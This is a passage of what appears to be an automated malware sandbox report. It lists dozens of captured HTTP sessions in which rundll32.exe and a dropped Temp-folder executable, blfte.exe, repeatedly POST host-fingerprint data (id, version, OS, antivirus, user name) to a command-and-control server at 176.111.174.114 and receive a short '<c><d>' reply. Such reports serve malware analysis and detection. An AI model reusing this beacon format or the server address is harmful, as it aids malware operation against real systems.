                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          112192.168.2.449806176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.655445099 CEST4815OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          113176.111.174.11480192.168.2.449806C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.752365112 CEST4815INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          114192.168.2.449807176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.967936993 CEST4816OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          115176.111.174.11480192.168.2.449807C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.067342997 CEST4816INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          116192.168.2.449808176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.278501034 CEST4817OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          117176.111.174.11480192.168.2.449808C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.376502037 CEST4817INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          118192.168.2.449809176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.580667973 CEST4818OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          119176.111.174.11480192.168.2.449809C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.681278944 CEST4818INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          12192.168.2.449754176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.172408104 CEST4527OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          120192.168.2.449810176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.894851923 CEST4819OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          121176.111.174.11480192.168.2.449810C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:28.996047974 CEST4819INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          122192.168.2.449811176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.208331108 CEST4820OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          123176.111.174.11480192.168.2.449811C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.310987949 CEST4820INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          124192.168.2.449812176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.517534971 CEST4821OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          125176.111.174.11480192.168.2.449812C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.619048119 CEST4822INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          126192.168.2.449813176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.831132889 CEST4822OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          127176.111.174.11480192.168.2.449813C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:29.933906078 CEST4823INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          128192.168.2.449814176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.141639948 CEST4823OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          129176.111.174.11480192.168.2.449814C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.243127108 CEST4824INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          13176.111.174.11480192.168.2.449754C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.274120092 CEST4527INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          130192.168.2.449815176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.534421921 CEST4824OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          131176.111.174.11480192.168.2.449815C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.638287067 CEST4825INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          132192.168.2.449816176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.861617088 CEST4826OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          133176.111.174.11480192.168.2.449816C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:30.965781927 CEST4826INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          134192.168.2.449817176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.171792984 CEST4827OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          135176.111.174.11480192.168.2.449817C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.271398067 CEST4827INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          136192.168.2.449818176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.490046024 CEST4828OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          137176.111.174.11480192.168.2.449818C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.594208002 CEST4828INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          138192.168.2.449819176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.846139908 CEST4829OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          139176.111.174.11480192.168.2.449819C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:31.947740078 CEST4829INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          14192.168.2.449755176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.480580091 CEST4528OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          140192.168.2.449820176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:32.434592009 CEST4830OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
